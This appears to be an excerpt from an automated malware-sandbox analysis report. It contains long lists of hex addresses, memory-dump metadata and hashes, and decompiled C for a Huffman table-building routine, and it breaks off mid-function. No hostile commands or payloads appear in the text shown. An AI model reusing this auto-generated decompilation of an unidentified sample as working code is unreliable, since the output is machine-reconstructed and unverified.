                                                                                    0x00000000
                                                                                    0x004067f0
                                                                                    0x004067c5
                                                                                    0x004067c8
                                                                                    0x004067cf
                                                                                    0x004067d2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067f8
                                                                                    0x004067f8
                                                                                    0x0040681d
                                                                                    0x0040681d
                                                                                    0x0040681d
                                                                                    0x0040681f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067fd
                                                                                    0x004067fd
                                                                                    0x00406801
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406807
                                                                                    0x00406807
                                                                                    0x0040680a
                                                                                    0x0040680d
                                                                                    0x00406810
                                                                                    0x00406812
                                                                                    0x00406814
                                                                                    0x00406817
                                                                                    0x0040681a
                                                                                    0x0040681a
                                                                                    0x0040681a
                                                                                    0x00406821
                                                                                    0x00406829
                                                                                    0x0040682c
                                                                                    0x0040682f
                                                                                    0x00406831
                                                                                    0x00406834
                                                                                    0x00406834
                                                                                    0x00406836
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040683c
                                                                                    0x0040683c
                                                                                    0x0040683f
                                                                                    0x00406844
                                                                                    0x00406846
                                                                                    0x0040684c
                                                                                    0x0040684e
                                                                                    0x00406863
                                                                                    0x00406865
                                                                                    0x00406865
                                                                                    0x00406850
                                                                                    0x00406856
                                                                                    0x00406858
                                                                                    0x0040685a
                                                                                    0x0040685a
                                                                                    0x00406867
                                                                                    0x0040686b
                                                                                    0x0040686e
                                                                                    0x00406874
                                                                                    0x00406874
                                                                                    0x00406877
                                                                                    0x00406877
                                                                                    0x00406877
                                                                                    0x00406879
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040687f
                                                                                    0x0040687f
                                                                                    0x00406885
                                                                                    0x00406887
                                                                                    0x004068ac
                                                                                    0x004068af
                                                                                    0x004068b5
                                                                                    0x004068ba
                                                                                    0x004068c0
                                                                                    0x004068c6
                                                                                    0x004068c8
                                                                                    0x004068cb
                                                                                    0x004068d4
                                                                                    0x004068da
                                                                                    0x004068da
                                                                                    0x004068cd
                                                                                    0x004068cf
                                                                                    0x004068d1
                                                                                    0x004068d1
                                                                                    0x004068dc
                                                                                    0x004068e2
                                                                                    0x004068e4
                                                                                    0x004068e7
                                                                                    0x004068e9
                                                                                    0x004068ef
                                                                                    0x004068f1
                                                                                    0x004068f3
                                                                                    0x004068f5
                                                                                    0x004068f7
                                                                                    0x004068fa
                                                                                    0x00406903
                                                                                    0x00406906
                                                                                    0x00406906
                                                                                    0x004068fc
                                                                                    0x004068fc
                                                                                    0x004068ff
                                                                                    0x004068ff
                                                                                    0x004068fa
                                                                                    0x004068f1
                                                                                    0x00406908
                                                                                    0x0040690a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040690a
                                                                                    0x00406889
                                                                                    0x00406889
                                                                                    0x0040688f
                                                                                    0x00406895
                                                                                    0x00406897
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406899
                                                                                    0x00406899
                                                                                    0x0040689b
                                                                                    0x0040689d
                                                                                    0x004068a6
                                                                                    0x004068a6
                                                                                    0x0040689f
                                                                                    0x0040689f
                                                                                    0x004068a2
                                                                                    0x004068a2
                                                                                    0x004068a8
                                                                                    0x004068aa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406910
                                                                                    0x00406910
                                                                                    0x00406915
                                                                                    0x00406917
                                                                                    0x00406918
                                                                                    0x00406919
                                                                                    0x0040691a
                                                                                    0x00406920
                                                                                    0x00406923
                                                                                    0x00406926
                                                                                    0x00406929
                                                                                    0x0040692b
                                                                                    0x00406931
                                                                                    0x00406931
                                                                                    0x00406934
                                                                                    0x00406934
                                                                                    0x00406934
                                                                                    0x00406934
                                                                                    0x0040693d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406942
                                                                                    0x00406942
                                                                                    0x00406945
                                                                                    0x00406948
                                                                                    0x0040694a
                                                                                    0x004069e1
                                                                                    0x004069e1
                                                                                    0x004069e4
                                                                                    0x004069e6
                                                                                    0x004069e7
                                                                                    0x004069e8
                                                                                    0x004069eb
                                                                                    0x00000000
                                                                                    0x004069eb
                                                                                    0x00406950
                                                                                    0x00406950
                                                                                    0x00406956
                                                                                    0x00406958
                                                                                    0x0040697d
                                                                                    0x00406980
                                                                                    0x00406986
                                                                                    0x0040698b
                                                                                    0x00406991
                                                                                    0x00406997
                                                                                    0x00406999
                                                                                    0x0040699c
                                                                                    0x004069a5
                                                                                    0x004069ab
                                                                                    0x004069ab
                                                                                    0x0040699e
                                                                                    0x004069a0
                                                                                    0x004069a2
                                                                                    0x004069a2
                                                                                    0x004069ad
                                                                                    0x004069b3
                                                                                    0x004069b5
                                                                                    0x004069b8
                                                                                    0x004069ba
                                                                                    0x004069c0
                                                                                    0x004069c2
                                                                                    0x004069c4
                                                                                    0x004069c6
                                                                                    0x004069c8
                                                                                    0x004069cb
                                                                                    0x004069d4
                                                                                    0x004069d7
                                                                                    0x004069d7
                                                                                    0x004069cd
                                                                                    0x004069cd
                                                                                    0x004069d0
                                                                                    0x004069d0
                                                                                    0x004069cb
                                                                                    0x004069c2
                                                                                    0x004069d9
                                                                                    0x004069db
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004069db
                                                                                    0x0040695a
                                                                                    0x0040695a
                                                                                    0x00406960
                                                                                    0x00406966
                                                                                    0x00406968
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040696a
                                                                                    0x0040696a
                                                                                    0x0040696c
                                                                                    0x0040696e
                                                                                    0x00406975
                                                                                    0x00406975
                                                                                    0x00406977
                                                                                    0x00406970
                                                                                    0x00406970
                                                                                    0x00406972
                                                                                    0x00406972
                                                                                    0x00406979
                                                                                    0x0040697b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004069f3
                                                                                    0x004069f3
                                                                                    0x004069f6
                                                                                    0x004069f8
                                                                                    0x004069fb
                                                                                    0x004069fe
                                                                                    0x004069fe
                                                                                    0x004069fe
                                                                                    0x004069fe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004060ac
                                                                                    0x00406090
                                                                                    0x00000000
                                                                                    0x00406096
                                                                                    0x00406099
                                                                                    0x004060a3
                                                                                    0x004060a6
                                                                                    0x004060a9
                                                                                    0x00000000
                                                                                    0x004060a9
                                                                                    0x00406090
                                                                                    0x004060b4
                                                                                    0x004060b7
                                                                                    0x004060bb
                                                                                    0x004060c5
                                                                                    0x004060cf
                                                                                    0x004060d2
                                                                                    0x004060d8
                                                                                    0x0040620c
                                                                                    0x0040620e
                                                                                    0x00406214
                                                                                    0x00406217
                                                                                    0x0040621a
                                                                                    0x00000000
                                                                                    0x0040621a
                                                                                    0x004060de
                                                                                    0x004060de
                                                                                    0x004060df
                                                                                    0x00406137
                                                                                    0x00406137
                                                                                    0x0040613e
                                                                                    0x004061e4
                                                                                    0x004061e4
                                                                                    0x004061e9
                                                                                    0x004061ec
                                                                                    0x004061f1
                                                                                    0x004061f4
                                                                                    0x004061f9
                                                                                    0x004061fc
                                                                                    0x00406201
                                                                                    0x00406204
                                                                                    0x00406204
                                                                                    0x00000000
                                                                                    0x00406144
                                                                                    0x00406144
                                                                                    0x00406144
                                                                                    0x00406144
                                                                                    0x00406148
                                                                                    0x00406148
                                                                                    0x0040616a
                                                                                    0x0040616d
                                                                                    0x0040616f
                                                                                    0x00406172
                                                                                    0x00406177
                                                                                    0x0040614d
                                                                                    0x0040614d
                                                                                    0x00406152
                                                                                    0x00406154
                                                                                    0x00406156
                                                                                    0x0040615b
                                                                                    0x00406161
                                                                                    0x00406166
                                                                                    0x00406168
                                                                                    0x00406168
                                                                                    0x0040615d
                                                                                    0x0040615d
                                                                                    0x0040615d
                                                                                    0x0040615b
                                                                                    0x00000000
                                                                                    0x00406179
                                                                                    0x004061a6
                                                                                    0x004061ab
                                                                                    0x004061ad
                                                                                    0x004061ae
                                                                                    0x004061b0
                                                                                    0x004061b1
                                                                                    0x004061b1
                                                                                    0x004061b1
                                                                                    0x004061d9
                                                                                    0x004061de
                                                                                    0x004061de
                                                                                    0x00000000
                                                                                    0x004061de
                                                                                    0x00406177
                                                                                    0x0040613e
                                                                                    0x004060e1
                                                                                    0x004060e1
                                                                                    0x004060e2
                                                                                    0x0040612c
                                                                                    0x00000000
                                                                                    0x0040612c
                                                                                    0x004060e4
                                                                                    0x004060e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406241
                                                                                    0x00406241
                                                                                    0x00406241
                                                                                    0x00406244
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406221
                                                                                    0x00406221
                                                                                    0x00406225
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040622b
                                                                                    0x0040622b
                                                                                    0x0040622e
                                                                                    0x00406231
                                                                                    0x00406236
                                                                                    0x00406238
                                                                                    0x0040623b
                                                                                    0x0040623e
                                                                                    0x0040623e
                                                                                    0x0040623e
                                                                                    0x00406246
                                                                                    0x00406246
                                                                                    0x00406249
                                                                                    0x0040624b
                                                                                    0x00406250
                                                                                    0x00406253
                                                                                    0x00406255
                                                                                    0x00406258
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040625e
                                                                                    0x0040625e
                                                                                    0x00406260
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406266
                                                                                    0x00406266
                                                                                    0x0040626a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406270
                                                                                    0x00406270
                                                                                    0x00406273
                                                                                    0x00406275
                                                                                    0x00406313
                                                                                    0x00406313
                                                                                    0x00406316
                                                                                    0x00406318
                                                                                    0x00406318
                                                                                    0x0040631b
                                                                                    0x0040631e
                                                                                    0x00406320
                                                                                    0x00406322
                                                                                    0x00406324
                                                                                    0x00406324
                                                                                    0x0040632d
                                                                                    0x00406332
                                                                                    0x00406335
                                                                                    0x00406338
                                                                                    0x0040633b
                                                                                    0x0040633e
                                                                                    0x0040633e
                                                                                    0x0040633e
                                                                                    0x00406341
                                                                                    0x00406347
                                                                                    0x00406347
                                                                                    0x0040634d
                                                                                    0x0040634d
                                                                                    0x0040634d
                                                                                    0x00000000
                                                                                    0x00406341
                                                                                    0x0040627b
                                                                                    0x0040627b
                                                                                    0x00406281
                                                                                    0x00406284
                                                                                    0x00406286
                                                                                    0x004062b1
                                                                                    0x004062b4
                                                                                    0x004062ba
                                                                                    0x004062bf
                                                                                    0x004062c5
                                                                                    0x004062cb
                                                                                    0x004062cd
                                                                                    0x004062d0
                                                                                    0x004062d9
                                                                                    0x004062df
                                                                                    0x004062df
                                                                                    0x004062d2
                                                                                    0x004062d4
                                                                                    0x004062d6
                                                                                    0x004062d6
                                                                                    0x004062e1
                                                                                    0x004062e7
                                                                                    0x004062ea
                                                                                    0x004062ec
                                                                                    0x004062ee
                                                                                    0x004062f4
                                                                                    0x004062f6
                                                                                    0x004062f8
                                                                                    0x004062fb
                                                                                    0x00406304
                                                                                    0x00406304
                                                                                    0x00406306
                                                                                    0x004062fd
                                                                                    0x004062fd
                                                                                    0x00406300
                                                                                    0x00406300
                                                                                    0x00406308
                                                                                    0x00406308
                                                                                    0x004062f6
                                                                                    0x0040630b
                                                                                    0x0040630d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040630d
                                                                                    0x00406288
                                                                                    0x00406288
                                                                                    0x0040628e
                                                                                    0x00406294
                                                                                    0x00406296
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406298
                                                                                    0x00406298
                                                                                    0x0040629a
                                                                                    0x0040629c
                                                                                    0x0040629f
                                                                                    0x004062a6
                                                                                    0x004062a6
                                                                                    0x004062a8
                                                                                    0x004062a1
                                                                                    0x004062a1
                                                                                    0x004062a3
                                                                                    0x004062a3
                                                                                    0x004062aa
                                                                                    0x004062ac
                                                                                    0x004062af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004063b3
                                                                                    0x004063b6
                                                                                    0x004063b9
                                                                                    0x004063bf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406596
                                                                                    0x00406596
                                                                                    0x00406596
                                                                                    0x00406599
                                                                                    0x0040659c
                                                                                    0x0040659e
                                                                                    0x004065a1
                                                                                    0x004065a7
                                                                                    0x004065ae
                                                                                    0x004065b0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406484
                                                                                    0x00406484
                                                                                    0x004064ac
                                                                                    0x004064ac
                                                                                    0x004064ac
                                                                                    0x004064ae
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040648c
                                                                                    0x0040648c
                                                                                    0x00406490
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406496
                                                                                    0x00406496
                                                                                    0x00406499
                                                                                    0x0040649c
                                                                                    0x0040649f
                                                                                    0x004064a1
                                                                                    0x004064a3
                                                                                    0x004064a6
                                                                                    0x004064a9
                                                                                    0x004064a9
                                                                                    0x004064a9
                                                                                    0x004064b0
                                                                                    0x004064b0
                                                                                    0x004064b8
                                                                                    0x004064bb
                                                                                    0x004064c1
                                                                                    0x004064c4
                                                                                    0x004064c8
                                                                                    0x004064cc
                                                                                    0x004064cf
                                                                                    0x004064d2
                                                                                    0x004064ea
                                                                                    0x004064ea
                                                                                    0x004064ed
                                                                                    0x004064fb
                                                                                    0x004064fe
                                                                                    0x004064ef
                                                                                    0x004064ef
                                                                                    0x004064f1
                                                                                    0x004064f8
                                                                                    0x004064f8
                                                                                    0x00406527
                                                                                    0x00406527
                                                                                    0x00406527
                                                                                    0x0040652a
                                                                                    0x0040652c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406507
                                                                                    0x00406507
                                                                                    0x0040650b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406511
                                                                                    0x00406511
                                                                                    0x00406514
                                                                                    0x00406517
                                                                                    0x0040651a
                                                                                    0x0040651c
                                                                                    0x0040651e
                                                                                    0x00406521
                                                                                    0x00406524
                                                                                    0x00406524
                                                                                    0x00406524
                                                                                    0x0040652e
                                                                                    0x0040652e
                                                                                    0x00406530
                                                                                    0x00406532
                                                                                    0x0040653d
                                                                                    0x00406540
                                                                                    0x00406543
                                                                                    0x00406545
                                                                                    0x00406547
                                                                                    0x00406549
                                                                                    0x0040654c
                                                                                    0x0040654f
                                                                                    0x00406554
                                                                                    0x00406557
                                                                                    0x0040655a
                                                                                    0x0040655d
                                                                                    0x00406564
                                                                                    0x00406567
                                                                                    0x00406569
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040656f
                                                                                    0x0040656f
                                                                                    0x00406573
                                                                                    0x00406584
                                                                                    0x00406584
                                                                                    0x00406584
                                                                                    0x00406586
                                                                                    0x00406586
                                                                                    0x0040658a
                                                                                    0x0040658a
                                                                                    0x0040658a
                                                                                    0x0040658c
                                                                                    0x0040658d
                                                                                    0x00406590
                                                                                    0x00406590
                                                                                    0x00406590
                                                                                    0x00406593
                                                                                    0x00000000
                                                                                    0x00406593
                                                                                    0x00406575
                                                                                    0x00406575
                                                                                    0x00406578
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040657e
                                                                                    0x0040657e
                                                                                    0x00000000
                                                                                    0x0040657e
                                                                                    0x004064d4
                                                                                    0x004064d4
                                                                                    0x004064d6
                                                                                    0x004064d8
                                                                                    0x004064db
                                                                                    0x004064de
                                                                                    0x004064e2
                                                                                    0x004064e2
                                                                                    0x004065b6
                                                                                    0x004065b6
                                                                                    0x004065b9
                                                                                    0x004065c0
                                                                                    0x004065c4
                                                                                    0x004065c6
                                                                                    0x004065c9
                                                                                    0x004065cc
                                                                                    0x004065d1
                                                                                    0x004065d4
                                                                                    0x004065d6
                                                                                    0x004065d7
                                                                                    0x004065da
                                                                                    0x004065e5
                                                                                    0x004065e8
                                                                                    0x004065ff
                                                                                    0x00406604
                                                                                    0x0040660b
                                                                                    0x00406610
                                                                                    0x00406614
                                                                                    0x00406616
                                                                                    0x00406616
                                                                                    0x00406616
                                                                                    0x00406619
                                                                                    0x0040661b
                                                                                    0x00000000
                                                                                    0x00406621
                                                                                    0x00406621
                                                                                    0x00406625
                                                                                    0x00406630
                                                                                    0x00406643
                                                                                    0x00406648
                                                                                    0x0040664d
                                                                                    0x0040664f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406655
                                                                                    0x00406655
                                                                                    0x00406658
                                                                                    0x0040665a
                                                                                    0x00406668
                                                                                    0x00406668
                                                                                    0x0040666b
                                                                                    0x0040666b
                                                                                    0x0040666e
                                                                                    0x00406671
                                                                                    0x00406674
                                                                                    0x00406677
                                                                                    0x0040667a
                                                                                    0x0040667d
                                                                                    0x00000000
                                                                                    0x0040667d
                                                                                    0x0040665c
                                                                                    0x0040665c
                                                                                    0x00406662
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406662
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406a01
                                                                                    0x00406a01
                                                                                    0x00406a07
                                                                                    0x00406a0d
                                                                                    0x00406a12
                                                                                    0x00406a18
                                                                                    0x00406a1e
                                                                                    0x00406a20
                                                                                    0x00406a23
                                                                                    0x00406a2c
                                                                                    0x00406a32
                                                                                    0x00406a32
                                                                                    0x00406a25
                                                                                    0x00406a27
                                                                                    0x00406a29
                                                                                    0x00406a29
                                                                                    0x00406a34
                                                                                    0x00406a36
                                                                                    0x00406a39
                                                                                    0x00406a74
                                                                                    0x00406a74
                                                                                    0x00000000
                                                                                    0x00406a3b
                                                                                    0x00406a3b
                                                                                    0x00406a3b
                                                                                    0x00406a41
                                                                                    0x00406a44
                                                                                    0x00406a46
                                                                                    0x00406a7b
                                                                                    0x00406a7d
                                                                                    0x00000000
                                                                                    0x00406a7d
                                                                                    0x00000000
                                                                                    0x00406a46
                                                                                    0x00000000
                                                                                    0x00406085
                                                                                    0x00406a53
                                                                                    0x00000000
                                                                                    0x00406a53
                                                                                    0x00406467
                                                                                    0x00406469
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040646b
                                                                                    0x0040646b
                                                                                    0x0040646e
                                                                                    0x00000000
                                                                                    0x0040646e
                                                                                    0x004063b3
                                                                                    0x00406374
                                                                                    0x00406a58
                                                                                    0x00406a5b
                                                                                    0x00406a5d
                                                                                    0x00406a66
                                                                                    0x00406a6c
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                                                    • Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
                                                                                    • Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                                                    • Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                    				signed int _v8;
                                                                                    				unsigned int _v12;
                                                                                    				signed int _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				signed int _v24;
                                                                                    				signed int _v28;
                                                                                    				intOrPtr* _v32;
                                                                                    				signed int* _v36;
                                                                                    				signed int _v40;
                                                                                    				signed int _v44;
                                                                                    				intOrPtr _v48;
                                                                                    				intOrPtr _v52;
                                                                                    				void _v116;
                                                                                    				signed int _v176;
                                                                                    				signed int _v180;
                                                                                    				signed int _v240;
                                                                                    				signed int _t166;
                                                                                    				signed int _t168;
                                                                                    				intOrPtr _t175;
                                                                                    				signed int _t181;
                                                                                    				void* _t182;
                                                                                    				intOrPtr _t183;
                                                                                    				signed int* _t184;
                                                                                    				signed int _t186;
                                                                                    				signed int _t187;
                                                                                    				signed int* _t189;
                                                                                    				signed int _t190;
                                                                                    				intOrPtr* _t191;
                                                                                    				intOrPtr _t192;
                                                                                    				signed int _t193;
                                                                                    				signed int _t195;
                                                                                    				signed int _t200;
                                                                                    				signed int _t205;
                                                                                    				void* _t207;
                                                                                    				short _t208;
                                                                                    				signed char _t222;
                                                                                    				signed int _t224;
                                                                                    				signed int _t225;
                                                                                    				signed int* _t232;
                                                                                    				signed int _t233;
                                                                                    				signed int _t234;
                                                                                    				void* _t235;
                                                                                    				signed int _t236;
                                                                                    				signed int _t244;
                                                                                    				signed int _t246;
                                                                                    				signed int _t251;
                                                                                    				signed int _t254;
                                                                                    				signed int _t256;
                                                                                    				signed int _t259;
                                                                                    				signed int _t262;
                                                                                    				void* _t263;
                                                                                    				void* _t264;
                                                                                    				signed int _t267;
                                                                                    				intOrPtr _t269;
                                                                                    				intOrPtr _t271;
                                                                                    				signed int _t274;
                                                                                    				intOrPtr* _t275;
                                                                                    				unsigned int _t276;
                                                                                    				void* _t277;
                                                                                    				signed int _t278;
                                                                                    				intOrPtr* _t279;
                                                                                    				signed int _t281;
                                                                                    				intOrPtr _t282;
                                                                                    				intOrPtr _t283;
                                                                                    				signed int* _t284;
                                                                                    				signed int _t286;
                                                                                    				signed int _t287;
                                                                                    				signed int _t288;
                                                                                    				signed int _t296;
                                                                                    				signed int* _t297;
                                                                                    				intOrPtr _t298;
                                                                                    				void* _t299;
                                                                                    
                                                                                    				_t278 = _a8;
                                                                                    				_t187 = 0x10;
                                                                                    				memset( &_v116, 0, _t187 << 2);
                                                                                    				_t189 = _a4;
                                                                                    				_t233 = _t278;
                                                                                    				do {
                                                                                    					_t166 =  *_t189;
                                                                                    					_t189 =  &(_t189[1]);
                                                                                    					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                    					_t233 = _t233 - 1;
                                                                                    				} while (_t233 != 0);
                                                                                    				if(_v116 != _t278) {
                                                                                    					_t279 = _a28;
                                                                                    					_t267 =  *_t279;
                                                                                    					_t190 = 1;
                                                                                    					_a28 = _t267;
                                                                                    					_t234 = 0xf;
                                                                                    					while(1) {
                                                                                    						_t168 = 0;
                                                                                    						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                    							break;
                                                                                    						}
                                                                                    						_t190 = _t190 + 1;
                                                                                    						if(_t190 <= _t234) {
                                                                                    							continue;
                                                                                    						}
                                                                                    						break;
                                                                                    					}
                                                                                    					_v8 = _t190;
                                                                                    					if(_t267 < _t190) {
                                                                                    						_a28 = _t190;
                                                                                    					}
                                                                                    					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                    						_t234 = _t234 - 1;
                                                                                    						if(_t234 != 0) {
                                                                                    							continue;
                                                                                    						}
                                                                                    						break;
                                                                                    					}
                                                                                    					_v28 = _t234;
                                                                                    					if(_a28 > _t234) {
                                                                                    						_a28 = _t234;
                                                                                    					}
                                                                                    					 *_t279 = _a28;
                                                                                    					_t181 = 1 << _t190;
                                                                                    					while(_t190 < _t234) {
                                                                                    						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                    						if(_t182 < 0) {
                                                                                    							L64:
                                                                                    							return _t168 | 0xffffffff;
                                                                                    						}
                                                                                    						_t190 = _t190 + 1;
                                                                                    						_t181 = _t182 + _t182;
                                                                                    					}
                                                                                    					_t281 = _t234 << 2;
                                                                                    					_t191 = _t299 + _t281 - 0x70;
                                                                                    					_t269 =  *_t191;
                                                                                    					_t183 = _t181 - _t269;
                                                                                    					_v52 = _t183;
                                                                                    					if(_t183 < 0) {
                                                                                    						goto L64;
                                                                                    					}
                                                                                    					_v176 = _t168;
                                                                                    					 *_t191 = _t269 + _t183;
                                                                                    					_t192 = 0;
                                                                                    					_t235 = _t234 - 1;
                                                                                    					if(_t235 == 0) {
                                                                                    						L21:
                                                                                    						_t184 = _a4;
                                                                                    						_t271 = 0;
                                                                                    						do {
                                                                                    							_t193 =  *_t184;
                                                                                    							_t184 =  &(_t184[1]);
                                                                                    							if(_t193 != _t168) {
                                                                                    								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                    								_t236 =  *_t232;
                                                                                    								 *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
                                                                                    								 *_t232 = _t236 + 1;
                                                                                    							}
                                                                                    							_t271 = _t271 + 1;
                                                                                    						} while (_t271 < _a8);
                                                                                    						_v16 = _v16 | 0xffffffff;
                                                                                    						_v40 = _v40 & 0x00000000;
                                                                                    						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                    						_t195 = _v8;
                                                                                    						_t186 =  ~_a28;
                                                                                    						_v12 = _t168;
                                                                                    						_v180 = _t168;
                                                                                    						_v36 = 0x42ceb8;
                                                                                    						_v240 = _t168;
                                                                                    						if(_t195 > _v28) {
                                                                                    							L62:
                                                                                    							_t168 = 0;
                                                                                    							if(_v52 == 0 || _v28 == 1) {
                                                                                    								return _t168;
                                                                                    							} else {
                                                                                    								goto L64;
                                                                                    							}
                                                                                    						}
                                                                                    						_v44 = _t195 - 1;
                                                                                    						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                    						do {
                                                                                    							_t282 =  *_v32;
                                                                                    							if(_t282 == 0) {
                                                                                    								goto L61;
                                                                                    							}
                                                                                    							while(1) {
                                                                                    								_t283 = _t282 - 1;
                                                                                    								_t200 = _a28 + _t186;
                                                                                    								_v48 = _t283;
                                                                                    								_v24 = _t200;
                                                                                    								if(_v8 <= _t200) {
                                                                                    									goto L45;
                                                                                    								}
                                                                                    								L31:
                                                                                    								_v20 = _t283 + 1;
                                                                                    								do {
                                                                                    									_v16 = _v16 + 1;
                                                                                    									_t296 = _v28 - _v24;
                                                                                    									if(_t296 > _a28) {
                                                                                    										_t296 = _a28;
                                                                                    									}
                                                                                    									_t222 = _v8 - _v24;
                                                                                    									_t254 = 1 << _t222;
                                                                                    									if(1 <= _v20) {
                                                                                    										L40:
                                                                                    										_t256 =  *_a36;
                                                                                    										_t168 = 1 << _t222;
                                                                                    										_v40 = 1;
                                                                                    										_t274 = _t256 + 1;
                                                                                    										if(_t274 > 0x5a0) {
                                                                                    											goto L64;
                                                                                    										}
                                                                                    									} else {
                                                                                    										_t275 = _v32;
                                                                                    										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                    										if(_t222 >= _t296) {
                                                                                    											goto L40;
                                                                                    										}
                                                                                    										while(1) {
                                                                                    											_t222 = _t222 + 1;
                                                                                    											if(_t222 >= _t296) {
                                                                                    												goto L40;
                                                                                    											}
                                                                                    											_t275 = _t275 + 4;
                                                                                    											_t264 = _t263 + _t263;
                                                                                    											_t175 =  *_t275;
                                                                                    											if(_t264 <= _t175) {
                                                                                    												goto L40;
                                                                                    											}
                                                                                    											_t263 = _t264 - _t175;
                                                                                    										}
                                                                                    										goto L40;
                                                                                    									}
                                                                                    									_t168 = _a32 + _t256 * 4;
                                                                                    									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                    									 *_a36 = _t274;
                                                                                    									_t259 = _v16;
                                                                                    									 *_t297 = _t168;
                                                                                    									if(_t259 == 0) {
                                                                                    										 *_a24 = _t168;
                                                                                    									} else {
                                                                                    										_t276 = _v12;
                                                                                    										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                    										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                    										_a5 = _a28;
                                                                                    										_a4 = _t222;
                                                                                    										_t262 = _t276 >> _t186;
                                                                                    										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                    										 *(_t298 + _t262 * 4) = _a4;
                                                                                    									}
                                                                                    									_t224 = _v24;
                                                                                    									_t186 = _t224;
                                                                                    									_t225 = _t224 + _a28;
                                                                                    									_v24 = _t225;
                                                                                    								} while (_v8 > _t225);
                                                                                    								L45:
                                                                                    								_t284 = _v36;
                                                                                    								_a5 = _v8 - _t186;
                                                                                    								if(_t284 < 0x42ceb8 + _a8 * 4) {
                                                                                    									_t205 =  *_t284;
                                                                                    									if(_t205 >= _a12) {
                                                                                    										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                    										_v36 =  &(_v36[1]);
